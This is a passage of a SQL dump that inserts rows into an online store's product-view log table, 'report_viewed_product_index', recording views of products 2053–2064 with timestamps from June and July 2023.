(5138, NULL, NULL, 2062, 1, '2023-06-03 17:40:39'),
(5139, NULL, NULL, 2053, 1, '2023-06-03 19:40:54'),
(5140, NULL, NULL, 2064, 1, '2023-06-04 13:05:39'),
(5141, NULL, NULL, 2064, 1, '2023-06-04 13:48:44'),
(5142, NULL, NULL, 2053, 1, '2023-06-04 18:32:23'),
(5143, NULL, NULL, 2055, 1, '2023-06-05 03:51:00'),
(5144, NULL, NULL, 2064, 1, '2023-06-05 06:52:13'),
(5145, NULL, NULL, 2054, 1, '2023-06-05 14:33:29'),
(5146, NULL, NULL, 2055, 1, '2023-06-06 04:55:04'),
(5147, NULL, NULL, 2054, 1, '2023-06-06 06:41:48'),
(5148, NULL, NULL, 2059, 1, '2023-06-06 06:41:52'),
(5149, NULL, NULL, 2061, 1, '2023-06-06 06:41:56'),
(5150, NULL, NULL, 2058, 1, '2023-06-06 06:41:59'),
(5151, NULL, NULL, 2055, 1, '2023-06-06 15:26:32'),
(5152, NULL, NULL, 2055, 1, '2023-06-06 16:16:21'),
(5153, NULL, NULL, 2055, 1, '2023-06-06 16:16:32'),
(5154, NULL, NULL, 2054, 1, '2023-06-07 05:44:11'),
(5155, NULL, NULL, 2060, 1, '2023-06-08 04:20:51'),
(5156, NULL, NULL, 2064, 1, '2023-06-08 14:22:27'),
(5157, NULL, NULL, 2064, 1, '2023-06-09 03:25:34'),
(5158, NULL, NULL, 2060, 1, '2023-06-09 18:46:01'),
(5159, NULL, NULL, 2060, 1, '2023-06-10 08:01:52'),
(5160, NULL, NULL, 2060, 1, '2023-06-10 08:08:17'),
(5161, NULL, NULL, 2053, 1, '2023-06-10 08:39:49'),
(5162, NULL, NULL, 2064, 1, '2023-06-10 10:00:55'),
(5163, NULL, NULL, 2064, 1, '2023-06-10 13:45:45'),
(5164, NULL, NULL, 2062, 1, '2023-06-10 23:11:35'),
(5165, NULL, NULL, 2055, 1, '2023-06-11 01:00:26'),
(5166, NULL, NULL, 2064, 1, '2023-06-11 01:00:36'),
(5167, NULL, NULL, 2061, 1, '2023-06-11 01:00:45'),
(5168, NULL, NULL, 2058, 1, '2023-06-11 01:00:51'),
(5169, NULL, NULL, 2062, 1, '2023-06-11 01:44:50'),
(5170, NULL, NULL, 2064, 1, '2023-06-11 04:16:51'),
(5171, NULL, NULL, 2058, 1, '2023-06-11 06:27:52'),
(5172, NULL, NULL, 2064, 1, '2023-06-11 07:31:37'),
(5173, NULL, NULL, 2058, 1, '2023-06-11 14:43:19'),
(5174, NULL, NULL, 2062, 1, '2023-06-11 18:37:10'),
(5175, NULL, NULL, 2059, 1, '2023-06-11 18:37:11'),
(5176, NULL, NULL, 2054, 1, '2023-06-12 00:10:26'),
(5177, NULL, NULL, 2059, 1, '2023-06-12 00:26:33'),
(5178, NULL, NULL, 2061, 1, '2023-06-12 02:00:56'),
(5179, NULL, NULL, 2064, 1, '2023-06-12 22:48:00'),
(5180, NULL, NULL, 2063, 1, '2023-06-12 22:48:17'),
(5181, NULL, NULL, 2062, 1, '2023-06-12 22:48:29'),
(5182, NULL, NULL, 2061, 1, '2023-06-12 22:48:42'),
(5183, NULL, NULL, 2060, 1, '2023-06-12 22:48:54'),
(5184, NULL, NULL, 2059, 1, '2023-06-12 22:49:08'),
(5185, NULL, NULL, 2058, 1, '2023-06-12 22:49:20'),
(5186, NULL, NULL, 2055, 1, '2023-06-12 22:49:32'),
(5187, NULL, NULL, 2054, 1, '2023-06-12 22:49:48'),
(5188, NULL, NULL, 2053, 1, '2023-06-12 23:05:43'),
(5189, NULL, NULL, 2055, 1, '2023-06-13 07:47:14'),
(5190, NULL, NULL, 2063, 1, '2023-06-13 19:47:18'),
(5191, NULL, NULL, 2063, 1, '2023-06-14 02:52:13'),
(5192, NULL, NULL, 2060, 1, '2023-06-14 10:56:47'),
(5193, NULL, NULL, 2058, 1, '2023-06-14 12:03:25'),
(5194, NULL, NULL, 2059, 1, '2023-06-14 12:03:26'),
(5195, NULL, NULL, 2062, 1, '2023-06-14 12:03:27'),
(5196, NULL, NULL, 2055, 1, '2023-06-14 12:03:28'),
(5197, NULL, NULL, 2063, 1, '2023-06-14 12:03:29'),
(5198, NULL, NULL, 2054, 1, '2023-06-14 12:03:30'),
(5199, NULL, NULL, 2064, 1, '2023-06-14 12:03:31'),
(5200, NULL, NULL, 2061, 1, '2023-06-14 12:03:33'),
(5201, NULL, NULL, 2060, 1, '2023-06-14 12:03:34'),
(5202, NULL, NULL, 2053, 1, '2023-06-14 12:03:43'),
(5203, NULL, NULL, 2064, 1, '2023-06-14 12:27:30'),
(5204, NULL, NULL, 2063, 1, '2023-06-15 03:51:10'),
(5205, NULL, NULL, 2059, 1, '2023-06-16 15:44:04'),
(5206, NULL, NULL, 2062, 1, '2023-06-17 00:15:07'),
(5207, NULL, NULL, 2060, 1, '2023-06-17 06:03:57'),
(5208, NULL, NULL, 2063, 1, '2023-06-17 06:12:30'),
(5209, NULL, NULL, 2058, 1, '2023-06-17 06:33:44'),
(5210, NULL, NULL, 2055, 1, '2023-06-17 07:10:55'),
(5211, NULL, NULL, 2061, 1, '2023-06-17 08:23:51'),
(5212, NULL, NULL, 2062, 1, '2023-06-17 09:04:26'),
(5213, NULL, NULL, 2054, 1, '2023-06-17 10:22:47'),
(5214, NULL, NULL, 2059, 1, '2023-06-17 10:40:17'),
(5215, NULL, NULL, 2064, 1, '2023-06-17 10:54:26'),
(5216, NULL, NULL, 2061, 1, '2023-06-17 13:58:43'),
(5217, NULL, NULL, 2054, 1, '2023-06-17 18:42:37'),
(5218, NULL, NULL, 2064, 1, '2023-06-17 23:44:09'),
(5219, NULL, NULL, 2059, 1, '2023-06-17 23:47:48'),
(5220, NULL, NULL, 2054, 1, '2023-06-18 01:45:01'),
(5221, NULL, NULL, 2063, 1, '2023-06-18 01:50:25'),
(5222, NULL, NULL, 2055, 1, '2023-06-18 02:37:34'),
(5223, NULL, NULL, 2059, 1, '2023-06-18 02:41:12'),
(5224, NULL, NULL, 2055, 1, '2023-06-18 02:46:54'),
(5225, NULL, NULL, 2053, 1, '2023-06-18 15:05:23'),
(5226, NULL, NULL, 2064, 1, '2023-06-18 16:34:48'),
(5227, NULL, NULL, 2059, 1, '2023-06-18 16:35:37'),
(5228, NULL, NULL, 2059, 1, '2023-06-18 18:06:23'),
(5229, NULL, NULL, 2060, 1, '2023-06-18 20:24:36'),
(5230, NULL, NULL, 2060, 1, '2023-06-18 20:30:46'),
(5231, NULL, 68, 2061, 1, '2023-06-18 23:48:40'),
(5232, NULL, NULL, 2061, 1, '2023-06-19 04:59:33'),
(5233, NULL, NULL, 2060, 1, '2023-06-19 05:15:16'),
(5234, NULL, NULL, 2063, 1, '2023-06-19 05:15:20'),
(5235, NULL, NULL, 2061, 1, '2023-06-19 05:15:21'),
(5236, NULL, NULL, 2059, 1, '2023-06-19 05:15:25'),
(5237, NULL, NULL, 2055, 1, '2023-06-19 05:15:26'),
(5238, NULL, NULL, 2062, 1, '2023-06-19 05:15:27'),
(5239, NULL, NULL, 2058, 1, '2023-06-19 05:15:27'),
(5240, NULL, NULL, 2064, 1, '2023-06-19 05:15:29'),
(5241, NULL, NULL, 2054, 1, '2023-06-19 05:15:30'),
(5242, NULL, NULL, 2061, 1, '2023-06-19 06:07:39'),
(5243, NULL, NULL, 2064, 1, '2023-06-19 09:04:38'),
(5244, NULL, NULL, 2061, 1, '2023-06-19 10:46:11'),
(5245, NULL, NULL, 2054, 1, '2023-06-19 14:40:49'),
(5246, NULL, NULL, 2061, 1, '2023-06-19 14:51:33'),
(5247, NULL, NULL, 2060, 1, '2023-06-19 14:54:33'),
(5248, NULL, NULL, 2059, 1, '2023-06-19 14:58:20'),
(5249, NULL, NULL, 2058, 1, '2023-06-19 16:21:57'),
(5250, NULL, NULL, 2062, 1, '2023-06-19 16:22:47'),
(5251, NULL, NULL, 2055, 1, '2023-06-19 16:24:16'),
(5252, NULL, NULL, 2059, 1, '2023-06-19 16:24:29'),
(5253, NULL, NULL, 2060, 1, '2023-06-19 16:26:05'),
(5254, NULL, NULL, 2061, 1, '2023-06-19 16:27:13'),
(5255, NULL, NULL, 2054, 1, '2023-06-19 16:32:54'),
(5256, NULL, NULL, 2061, 1, '2023-06-19 16:36:48'),
(5257, NULL, NULL, 2063, 1, '2023-06-19 16:37:18'),
(5258, NULL, NULL, 2062, 1, '2023-06-19 16:37:29'),
(5259, NULL, NULL, 2059, 1, '2023-06-19 16:47:44'),
(5260, NULL, NULL, 2055, 1, '2023-06-19 16:50:42'),
(5261, NULL, NULL, 2058, 1, '2023-06-19 16:54:22'),
(5262, NULL, NULL, 2063, 1, '2023-06-19 16:58:18'),
(5263, NULL, NULL, 2054, 1, '2023-06-19 17:03:23');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(5264, NULL, NULL, 2064, 1, '2023-06-19 17:22:15'),
(5265, NULL, NULL, 2060, 1, '2023-06-19 17:28:34'),
(5266, NULL, NULL, 2064, 1, '2023-06-19 17:32:49'),
(5267, NULL, NULL, 2058, 1, '2023-06-20 03:09:56'),
(5268, NULL, NULL, 2061, 1, '2023-06-20 03:10:11'),
(5269, NULL, NULL, 2059, 1, '2023-06-20 03:10:21'),
(5270, NULL, NULL, 2060, 1, '2023-06-20 03:10:29'),
(5271, NULL, NULL, 2062, 1, '2023-06-20 03:10:38'),
(5272, NULL, NULL, 2063, 1, '2023-06-20 03:10:45'),
(5273, NULL, NULL, 2064, 1, '2023-06-20 03:10:53'),
(5274, NULL, NULL, 2055, 1, '2023-06-20 03:12:00'),
(5275, NULL, NULL, 2054, 1, '2023-06-20 03:12:12'),
(5276, NULL, NULL, 2053, 1, '2023-06-20 03:12:25'),
(5277, NULL, NULL, 2058, 1, '2023-06-20 04:17:51'),
(5278, NULL, NULL, 2061, 1, '2023-06-20 04:18:05'),
(5279, NULL, NULL, 2059, 1, '2023-06-20 04:18:19'),
(5280, NULL, NULL, 2060, 1, '2023-06-20 04:18:34'),
(5281, NULL, NULL, 2062, 1, '2023-06-20 04:18:49'),
(5282, NULL, NULL, 2063, 1, '2023-06-20 04:19:06'),
(5283, NULL, NULL, 2064, 1, '2023-06-20 04:19:27'),
(5284, NULL, NULL, 2055, 1, '2023-06-20 04:21:00'),
(5285, NULL, NULL, 2054, 1, '2023-06-20 04:21:11'),
(5286, NULL, NULL, 2053, 1, '2023-06-20 04:21:21'),
(5287, NULL, NULL, 2061, 1, '2023-06-21 04:02:07'),
(5288, NULL, NULL, 2060, 1, '2023-06-21 05:08:01'),
(5289, NULL, NULL, 2062, 1, '2023-06-21 18:46:09'),
(5290, NULL, NULL, 2062, 1, '2023-06-21 20:12:57'),
(5291, NULL, NULL, 2060, 1, '2023-06-21 21:39:45'),
(5292, NULL, NULL, 2059, 1, '2023-06-21 23:47:51'),
(5293, NULL, NULL, 2055, 1, '2023-06-22 03:44:50'),
(5294, NULL, NULL, 2063, 1, '2023-06-22 04:42:55'),
(5295, NULL, NULL, 2061, 1, '2023-06-22 10:51:56'),
(5296, NULL, NULL, 2054, 1, '2023-06-22 10:51:58'),
(5297, NULL, NULL, 2062, 1, '2023-06-22 13:15:29'),
(5298, NULL, NULL, 2062, 1, '2023-06-22 13:15:58'),
(5299, NULL, NULL, 2063, 1, '2023-06-22 15:54:33'),
(5300, NULL, NULL, 2061, 1, '2023-06-22 20:26:22'),
(5301, NULL, NULL, 2055, 1, '2023-06-22 20:39:55'),
(5302, NULL, NULL, 2059, 1, '2023-06-22 20:53:40'),
(5303, NULL, NULL, 2060, 1, '2023-06-22 20:55:10'),
(5304, NULL, NULL, 2059, 1, '2023-06-23 09:11:43'),
(5305, NULL, NULL, 2064, 1, '2023-06-23 13:57:52'),
(5306, NULL, NULL, 2064, 1, '2023-06-23 16:46:28'),
(5307, NULL, NULL, 2061, 1, '2023-06-23 17:50:17'),
(5308, NULL, NULL, 2062, 1, '2023-06-23 18:08:59'),
(5309, NULL, NULL, 2063, 1, '2023-06-23 18:34:32'),
(5310, NULL, NULL, 2060, 1, '2023-06-23 21:47:42'),
(5311, NULL, NULL, 2054, 1, '2023-06-23 22:11:40'),
(5312, NULL, NULL, 2055, 1, '2023-06-24 01:20:01'),
(5313, NULL, NULL, 2059, 1, '2023-06-24 02:43:58'),
(5314, NULL, NULL, 2062, 1, '2023-06-24 02:48:00'),
(5315, NULL, NULL, 2059, 1, '2023-06-24 06:43:53'),
(5316, NULL, NULL, 2058, 1, '2023-06-24 12:11:58'),
(5317, NULL, NULL, 2064, 1, '2023-06-24 13:43:25'),
(5318, NULL, NULL, 2059, 1, '2023-06-24 19:02:11'),
(5319, NULL, NULL, 2059, 1, '2023-06-24 20:31:08'),
(5320, NULL, NULL, 2055, 1, '2023-06-24 20:39:56'),
(5321, NULL, NULL, 2059, 1, '2023-06-24 21:29:23'),
(5322, NULL, NULL, 2054, 1, '2023-06-24 22:38:09'),
(5323, NULL, NULL, 2063, 1, '2023-06-25 04:26:23'),
(5324, NULL, NULL, 2063, 1, '2023-06-25 10:54:32'),
(5325, NULL, NULL, 2058, 1, '2023-06-25 11:57:41'),
(5326, NULL, NULL, 2064, 1, '2023-06-25 12:24:24'),
(5327, NULL, NULL, 2053, 1, '2023-06-25 15:49:51'),
(5328, NULL, NULL, 2053, 1, '2023-06-25 16:46:48'),
(5329, NULL, NULL, 2063, 1, '2023-06-25 17:18:34'),
(5330, NULL, NULL, 2054, 1, '2023-06-25 19:40:15'),
(5331, NULL, NULL, 2062, 1, '2023-06-25 22:49:01'),
(5332, NULL, NULL, 2060, 1, '2023-06-26 02:34:52'),
(5333, NULL, NULL, 2064, 1, '2023-06-26 10:27:39'),
(5334, NULL, NULL, 2054, 1, '2023-06-26 12:26:57'),
(5335, NULL, NULL, 2062, 1, '2023-06-26 19:52:33'),
(5336, NULL, NULL, 2064, 1, '2023-06-26 22:20:51'),
(5337, NULL, NULL, 2064, 1, '2023-06-27 05:04:15'),
(5338, NULL, NULL, 2064, 1, '2023-06-27 05:04:15'),
(5339, NULL, NULL, 2064, 1, '2023-06-27 06:46:48'),
(5340, NULL, NULL, 2058, 1, '2023-06-27 08:03:51'),
(5341, NULL, NULL, 2061, 1, '2023-06-27 13:01:31'),
(5342, NULL, NULL, 2060, 1, '2023-06-27 17:07:46'),
(5343, NULL, NULL, 2062, 1, '2023-06-27 18:48:58'),
(5344, NULL, NULL, 2062, 1, '2023-06-27 18:49:37'),
(5345, NULL, NULL, 2062, 1, '2023-06-27 18:55:37'),
(5346, NULL, NULL, 2062, 1, '2023-06-27 18:55:38'),
(5347, NULL, NULL, 2062, 1, '2023-06-27 19:05:04'),
(5348, NULL, NULL, 2062, 1, '2023-06-27 19:05:12'),
(5349, NULL, NULL, 2062, 1, '2023-06-27 19:05:32'),
(5350, NULL, NULL, 2062, 1, '2023-06-27 19:06:44'),
(5351, NULL, NULL, 2062, 1, '2023-06-27 19:06:57'),
(5352, NULL, NULL, 2062, 1, '2023-06-27 19:07:03'),
(5353, NULL, NULL, 2062, 1, '2023-06-27 19:14:35'),
(5354, NULL, NULL, 2062, 1, '2023-06-27 19:14:51'),
(5355, NULL, NULL, 2062, 1, '2023-06-27 19:20:58'),
(5356, NULL, NULL, 2062, 1, '2023-06-27 19:20:59'),
(5357, NULL, NULL, 2062, 1, '2023-06-27 19:22:24'),
(5358, NULL, NULL, 2062, 1, '2023-06-27 19:22:50'),
(5359, NULL, NULL, 2062, 1, '2023-06-27 19:29:16'),
(5360, NULL, NULL, 2062, 1, '2023-06-27 19:32:54'),
(5361, NULL, NULL, 2062, 1, '2023-06-27 19:42:59'),
(5362, NULL, NULL, 2062, 1, '2023-06-27 19:43:00'),
(5363, NULL, NULL, 2062, 1, '2023-06-27 19:44:26'),
(5364, NULL, NULL, 2062, 1, '2023-06-27 19:44:39'),
(5365, NULL, NULL, 2062, 1, '2023-06-27 19:50:59'),
(5366, NULL, NULL, 2062, 1, '2023-06-27 19:51:49'),
(5367, NULL, NULL, 2062, 1, '2023-06-27 19:58:57'),
(5368, NULL, NULL, 2062, 1, '2023-06-27 19:59:04'),
(5369, NULL, NULL, 2062, 1, '2023-06-27 20:00:04'),
(5370, NULL, NULL, 2062, 1, '2023-06-27 20:00:18'),
(5371, NULL, NULL, 2062, 1, '2023-06-27 20:05:43'),
(5372, NULL, NULL, 2062, 1, '2023-06-27 20:06:17'),
(5373, NULL, NULL, 2062, 1, '2023-06-27 20:14:57'),
(5374, NULL, NULL, 2062, 1, '2023-06-27 20:16:26'),
(5375, NULL, NULL, 2062, 1, '2023-06-27 20:24:25'),
(5376, NULL, NULL, 2060, 1, '2023-06-28 01:27:38'),
(5377, NULL, NULL, 2061, 1, '2023-06-28 08:08:43'),
(5378, NULL, NULL, 2059, 1, '2023-06-28 09:44:45'),
(5379, NULL, NULL, 2059, 1, '2023-06-28 11:49:43'),
(5380, NULL, NULL, 2062, 1, '2023-06-28 12:12:13'),
(5381, NULL, NULL, 2062, 1, '2023-06-28 19:26:56'),
(5382, NULL, NULL, 2064, 1, '2023-06-29 02:17:56'),
(5383, NULL, NULL, 2060, 1, '2023-06-29 10:05:52'),
(5384, NULL, NULL, 2054, 1, '2023-06-29 11:25:05'),
(5385, NULL, NULL, 2055, 1, '2023-06-29 12:11:36'),
(5386, NULL, NULL, 2058, 1, '2023-06-29 18:04:43'),
(5387, NULL, NULL, 2055, 1, '2023-06-29 18:19:23'),
(5388, NULL, NULL, 2063, 1, '2023-06-29 19:47:20'),
(5389, NULL, NULL, 2064, 1, '2023-06-29 23:01:16'),
(5390, NULL, NULL, 2054, 1, '2023-06-30 04:02:59'),
(5391, NULL, NULL, 2055, 1, '2023-06-30 05:52:01'),
(5392, NULL, NULL, 2063, 1, '2023-06-30 11:12:35'),
(5393, NULL, NULL, 2063, 1, '2023-06-30 11:12:41'),
(5394, NULL, NULL, 2058, 1, '2023-06-30 15:21:04'),
(5395, NULL, NULL, 2064, 1, '2023-06-30 20:19:15'),
(5396, NULL, NULL, 2062, 1, '2023-06-30 22:35:06'),
(5397, NULL, NULL, 2063, 1, '2023-07-01 02:08:23'),
(5398, NULL, NULL, 2061, 1, '2023-07-01 02:22:27'),
(5399, NULL, NULL, 2054, 1, '2023-07-01 03:11:00'),
(5400, NULL, NULL, 2060, 1, '2023-07-01 04:13:04'),
(5401, NULL, NULL, 2061, 1, '2023-07-01 04:16:56'),
(5402, NULL, NULL, 2062, 1, '2023-07-01 04:42:07'),
(5403, NULL, NULL, 2061, 1, '2023-07-01 05:20:40'),
(5404, NULL, NULL, 2059, 1, '2023-07-01 07:04:46'),
(5405, NULL, NULL, 2054, 1, '2023-07-01 07:33:44'),
(5406, NULL, NULL, 2060, 1, '2023-07-01 08:07:29'),
(5407, NULL, NULL, 2061, 1, '2023-07-01 08:43:57'),
(5408, NULL, NULL, 2059, 1, '2023-07-01 09:42:12'),
(5409, NULL, NULL, 2064, 1, '2023-07-01 10:29:14'),
(5410, NULL, NULL, 2062, 1, '2023-07-01 11:14:05'),
(5411, NULL, NULL, 2055, 1, '2023-07-01 12:27:04'),
(5412, NULL, NULL, 2063, 1, '2023-07-01 13:19:55'),
(5413, NULL, NULL, 2058, 1, '2023-07-01 13:36:16'),
(5414, NULL, NULL, 2054, 1, '2023-07-01 16:59:48'),
(5415, NULL, NULL, 2060, 1, '2023-07-01 17:35:04'),
(5416, NULL, NULL, 2061, 1, '2023-07-01 18:12:54'),
(5417, NULL, NULL, 2055, 1, '2023-07-01 18:22:42'),
(5418, NULL, NULL, 2054, 1, '2023-07-01 19:41:18'),
(5419, NULL, NULL, 2060, 1, '2023-07-01 20:41:29'),
(5420, NULL, NULL, 2062, 1, '2023-07-01 20:59:43'),
(5421, NULL, NULL, 2061, 1, '2023-07-01 21:46:55'),
(5422, NULL, NULL, 2059, 1, '2023-07-01 23:25:57'),
(5423, NULL, NULL, 2064, 1, '2023-07-02 00:40:43'),
(5424, NULL, NULL, 2062, 1, '2023-07-02 01:52:55'),
(5425, NULL, NULL, 2055, 1, '2023-07-02 03:46:23'),
(5426, NULL, NULL, 2053, 1, '2023-07-02 04:54:35'),
(5427, NULL, NULL, 2063, 1, '2023-07-02 05:13:40'),
(5428, NULL, NULL, 2058, 1, '2023-07-02 05:39:49'),
(5429, NULL, NULL, 2062, 1, '2023-07-02 06:49:35'),
(5430, NULL, NULL, 2053, 1, '2023-07-02 07:13:05'),
(5431, NULL, NULL, 2054, 1, '2023-07-02 07:13:09'),
(5432, NULL, NULL, 2055, 1, '2023-07-02 07:13:14'),
(5433, NULL, NULL, 2064, 1, '2023-07-02 07:13:30'),
(5434, NULL, NULL, 2063, 1, '2023-07-02 07:13:39'),
(5435, NULL, NULL, 2062, 1, '2023-07-02 07:13:42'),
(5436, NULL, NULL, 2060, 1, '2023-07-02 07:13:45'),
(5437, NULL, NULL, 2059, 1, '2023-07-02 07:13:49'),
(5438, NULL, NULL, 2061, 1, '2023-07-02 07:13:53'),
(5439, NULL, NULL, 2058, 1, '2023-07-02 07:13:57'),
(5440, NULL, NULL, 2061, 1, '2023-07-02 07:15:27'),
(5441, NULL, NULL, 2058, 1, '2023-07-02 07:20:11'),
(5442, NULL, NULL, 2061, 1, '2023-07-02 07:26:08'),
(5443, NULL, NULL, 2061, 1, '2023-07-02 08:45:50'),
(5444, NULL, NULL, 2059, 1, '2023-07-02 10:51:00'),
(5445, NULL, NULL, 2054, 1, '2023-07-02 11:12:20'),
(5446, NULL, NULL, 2058, 1, '2023-07-02 14:50:47'),
(5447, NULL, NULL, 2054, 1, '2023-07-02 17:37:30'),
(5448, NULL, NULL, 2058, 1, '2023-07-03 00:09:20'),
(5449, NULL, NULL, 2062, 1, '2023-07-03 15:57:48'),
(5450, NULL, NULL, 2054, 1, '2023-07-04 04:59:31'),
(5451, NULL, NULL, 2060, 1, '2023-07-04 04:59:36'),
(5452, NULL, NULL, 2061, 1, '2023-07-04 04:59:39'),
(5453, NULL, NULL, 2059, 1, '2023-07-04 04:59:42'),
(5454, NULL, NULL, 2064, 1, '2023-07-04 04:59:45'),
(5455, NULL, NULL, 2062, 1, '2023-07-04 04:59:49'),
(5456, NULL, NULL, 2055, 1, '2023-07-04 05:00:20'),
(5457, NULL, NULL, 2063, 1, '2023-07-04 05:00:52'),
(5458, NULL, NULL, 2058, 1, '2023-07-04 05:01:00'),
(5459, NULL, NULL, 2063, 1, '2023-07-04 09:30:09'),
(5460, NULL, NULL, 2062, 1, '2023-07-04 12:20:57'),
(5461, NULL, NULL, 2059, 1, '2023-07-04 12:21:02'),
(5462, NULL, NULL, 2064, 1, '2023-07-04 12:21:07'),
(5463, NULL, NULL, 2061, 1, '2023-07-04 12:21:23'),
(5464, NULL, NULL, 2063, 1, '2023-07-04 12:21:38'),
(5465, NULL, NULL, 2055, 1, '2023-07-04 12:21:45'),
(5466, NULL, NULL, 2054, 1, '2023-07-04 12:22:03'),
(5467, NULL, NULL, 2061, 1, '2023-07-04 15:54:55'),
(5468, NULL, NULL, 2058, 1, '2023-07-04 21:33:57'),
(5469, NULL, NULL, 2064, 1, '2023-07-04 21:34:14'),
(5470, NULL, NULL, 2062, 1, '2023-07-04 21:34:29'),
(5471, NULL, NULL, 2055, 1, '2023-07-04 21:34:32'),
(5472, NULL, NULL, 2059, 1, '2023-07-04 21:34:37'),
(5473, NULL, NULL, 2063, 1, '2023-07-04 21:34:40'),
(5474, NULL, NULL, 2061, 1, '2023-07-04 21:34:43'),
(5475, NULL, NULL, 2054, 1, '2023-07-04 21:34:51'),
(5476, NULL, NULL, 2060, 1, '2023-07-04 21:34:56'),
(5477, NULL, NULL, 2058, 1, '2023-07-04 21:36:57'),
(5478, NULL, NULL, 2064, 1, '2023-07-04 21:37:09'),
(5479, NULL, NULL, 2062, 1, '2023-07-04 21:37:14'),
(5480, NULL, NULL, 2055, 1, '2023-07-04 21:37:16'),
(5481, NULL, NULL, 2059, 1, '2023-07-04 21:37:22'),
(5482, NULL, NULL, 2063, 1, '2023-07-04 21:37:24'),
(5483, NULL, NULL, 2061, 1, '2023-07-04 21:37:26'),
(5484, NULL, NULL, 2060, 1, '2023-07-04 21:37:31'),
(5485, NULL, NULL, 2054, 1, '2023-07-04 21:37:35'),
(5486, NULL, NULL, 2053, 1, '2023-07-04 21:37:55'),
(5487, NULL, NULL, 2055, 1, '2023-07-04 23:36:47'),
(5488, NULL, NULL, 2055, 1, '2023-07-05 01:21:24'),
(5489, NULL, NULL, 2064, 1, '2023-07-05 01:23:29'),
(5490, NULL, NULL, 2063, 1, '2023-07-05 01:23:38'),
(5491, NULL, NULL, 2062, 1, '2023-07-05 01:23:48'),
(5492, NULL, NULL, 2060, 1, '2023-07-05 01:23:53'),
(5493, NULL, NULL, 2063, 1, '2023-07-05 17:11:41'),
(5494, NULL, NULL, 2059, 1, '2023-07-05 20:42:36'),
(5495, NULL, NULL, 2054, 1, '2023-07-05 20:50:41'),
(5496, NULL, NULL, 2064, 1, '2023-07-05 23:48:46'),
(5497, NULL, NULL, 2060, 1, '2023-07-06 04:10:10'),
(5498, NULL, NULL, 2054, 1, '2023-07-06 05:32:59'),
(5499, NULL, NULL, 2060, 1, '2023-07-06 06:06:10'),
(5500, NULL, NULL, 2061, 1, '2023-07-06 06:42:29'),
(5501, NULL, NULL, 2054, 1, '2023-07-06 07:46:53'),
(5502, NULL, NULL, 2060, 1, '2023-07-06 08:20:38'),
(5503, NULL, NULL, 2061, 1, '2023-07-06 08:57:28'),
(5504, NULL, NULL, 2059, 1, '2023-07-06 09:57:31'),
(5505, NULL, NULL, 2062, 1, '2023-07-06 10:45:45'),
(5506, NULL, NULL, 2064, 1, '2023-07-06 10:45:53'),
(5507, NULL, NULL, 2062, 1, '2023-07-06 11:33:24'),
(5508, NULL, NULL, 2055, 1, '2023-07-06 12:49:53'),
(5509, NULL, NULL, 2063, 1, '2023-07-06 13:46:58'),
(5510, NULL, NULL, 2058, 1, '2023-07-06 14:04:15'),
(5511, NULL, NULL, 2063, 1, '2023-07-06 15:15:58'),
(5512, NULL, NULL, 2059, 1, '2023-07-06 16:33:05'),
(5513, NULL, NULL, 2054, 1, '2023-07-06 16:33:06'),
(5514, NULL, NULL, 2058, 1, '2023-07-06 16:33:08'),
(5515, NULL, NULL, 2061, 1, '2023-07-06 16:33:09'),
(5516, NULL, NULL, 2062, 1, '2023-07-06 16:33:11'),
(5517, NULL, NULL, 2064, 1, '2023-07-06 16:33:11'),
(5518, NULL, NULL, 2064, 1, '2023-07-06 16:33:12'),
(5519, NULL, NULL, 2053, 1, '2023-07-06 16:33:13'),
(5520, NULL, NULL, 2060, 1, '2023-07-06 16:33:15'),
(5521, NULL, NULL, 2064, 1, '2023-07-06 16:33:16'),
(5522, NULL, NULL, 2063, 1, '2023-07-06 16:33:17'),
(5523, NULL, NULL, 2053, 1, '2023-07-06 16:33:18'),
(5524, NULL, NULL, 2055, 1, '2023-07-06 16:33:19'),
(5525, NULL, NULL, 2053, 1, '2023-07-06 16:33:22'),
(5526, NULL, NULL, 2059, 1, '2023-07-07 01:48:39'),
(5527, NULL, NULL, 2064, 1, '2023-07-07 02:56:46'),
(5528, NULL, NULL, 2062, 1, '2023-07-07 09:48:17'),
(5529, NULL, NULL, 2062, 1, '2023-07-07 16:48:17'),
(5530, NULL, NULL, 2054, 1, '2023-07-07 16:49:07'),
(5531, NULL, NULL, 2060, 1, '2023-07-07 17:57:54'),
(5532, NULL, NULL, 2054, 1, '2023-07-08 10:03:17'),
(5533, NULL, NULL, 2059, 1, '2023-07-09 15:14:37'),
(5534, NULL, NULL, 2063, 1, '2023-07-09 18:03:29'),
(5535, NULL, NULL, 2062, 1, '2023-07-10 01:17:32'),
(5536, NULL, NULL, 2064, 1, '2023-07-10 04:04:31'),
(5537, NULL, NULL, 2061, 1, '2023-07-10 07:34:58'),
(5538, NULL, NULL, 2061, 1, '2023-07-10 14:00:33'),
(5539, NULL, NULL, 2055, 1, '2023-07-10 15:04:09'),
(5540, NULL, NULL, 2064, 1, '2023-07-10 16:03:06'),
(5541, NULL, NULL, 2064, 1, '2023-07-10 17:34:34'),
(5542, NULL, NULL, 2062, 1, '2023-07-11 02:41:40'),
(5543, NULL, NULL, 2062, 1, '2023-07-11 02:41:44'),
(5544, NULL, NULL, 2059, 1, '2023-07-11 07:35:43'),
(5545, NULL, NULL, 2060, 1, '2023-07-11 08:25:01'),
(5546, NULL, NULL, 2062, 1, '2023-07-11 12:02:39'),
(5547, NULL, NULL, 2054, 1, '2023-07-11 12:04:24'),
(5548, NULL, NULL, 2061, 1, '2023-07-11 16:05:27'),
(5549, NULL, NULL, 2063, 1, '2023-07-12 01:58:21'),
(5550, NULL, NULL, 2059, 1, '2023-07-12 09:42:12'),
(5551, NULL, NULL, 2060, 1, '2023-07-12 11:40:08'),
(5552, NULL, NULL, 2063, 1, '2023-07-12 13:02:08'),
(5553, NULL, NULL, 2061, 1, '2023-07-12 14:03:01'),
(5554, NULL, NULL, 2058, 1, '2023-07-12 20:11:59'),
(5555, NULL, NULL, 2060, 1, '2023-07-12 20:43:23'),
(5556, NULL, NULL, 2064, 1, '2023-07-12 21:33:12'),
(5557, NULL, NULL, 2055, 1, '2023-07-13 00:49:52'),
(5558, NULL, NULL, 2055, 1, '2023-07-13 06:51:21'),
(5559, NULL, NULL, 2061, 1, '2023-07-13 11:17:10'),
(5560, NULL, NULL, 2055, 1, '2023-07-13 18:13:51'),
(5561, NULL, NULL, 2055, 1, '2023-07-14 01:06:36'),
(5562, NULL, NULL, 2064, 1, '2023-07-14 01:45:44'),
(5563, NULL, NULL, 2060, 1, '2023-07-14 07:37:26'),
